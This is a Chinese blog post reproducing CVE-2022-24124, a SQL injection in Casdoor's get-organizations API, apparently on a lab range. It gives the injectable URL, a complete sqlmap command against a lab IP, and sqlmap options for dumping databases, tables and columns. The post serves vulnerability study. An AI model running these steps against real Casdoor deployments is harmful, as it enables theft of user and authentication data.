casdoor SQL注入(CVE-2022-24124)

于 2024-07-18 11:47:07 发布
阅读量144 收藏
点赞数 3
分类专栏: # SQL注入 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140518985
版权

一、漏洞概述

Casdoor 是一个基于 OAuth 2.0 / OIDC 的 UI 优先集中认证 / 单点登录 (SSO) 平台,简单点说,就是 Casdoor 可以帮你解决 用户管理 的难题,你无需开发用户登录注册等与用户鉴权相关的一系列功能,只需几个步骤,简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor 1.13.1 之前的查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。

二、影响范围

Casdoor 1.13.1 之前版本

三、访问页面

四、漏洞复现

1、访问接口

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=1

2、使用sqlmap跑注入点

sqlmap.py -u "http://123.58.224.8:60317/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=1" --delay=0 --timeout=30 --retries=0 --level=3 --risk=1 --threads=1 --time-sec=5 --technique=BEUSTQ -b --batch --answers="crack=N,dict=N,continue=Y,quit=N"

3、发现field可注入

sqlmap常用命令:
1、--dbs 获取数据库
2、--tables 获取数据库中所有的表 
3、--columns 参数用来获取字段
4、--dump 获取值

-D '数据库名' -T '表名' -C '字段名1,字段名2' --dump

风中追风-fzzf
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Casdoor系统static任意文件读取漏洞
薛定谔嘚喵博客
10-07 307
Casdoor系统 static 存在任意文件读取漏洞,攻击者可利用该漏洞获取服务器上的敏感文件。
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 6928
春秋云境系列靶场记录合集,不更新了哈……
春秋云境:CVE-2022-24124Casdoor api get-oraganizations SQL注入
m0_65712192的博客
07-23 1129
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
08-31 2561
漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
weixin_46801402的博客
11-02 1059
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
春秋云镜 CVE-2022-24124
qq_22002773的博客
08-10 262
春秋云镜 CVE-2022-24124
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2540
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
CVE-2022-24124复现
giaogiaogioao的博客
11-26 808
CVE-2022-24124复现
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
【春秋云境】CVE-2022-24124复现
小高工作室
12-01 1103
【代码】【春秋云境】CVE-2022-24124复现。
【春秋云镜】CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 985
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
漏洞复现】Casdoor-任意文件读取
2301_80115097的博客
04-02 364
Casdoor系统static存在任意文件读取漏洞漏洞描述】Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。
处理casdoor明文传输高危漏洞遇到的问题整理
weixin_55751581的博客
07-05 1028
casdoor处理明文传输问题整理
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值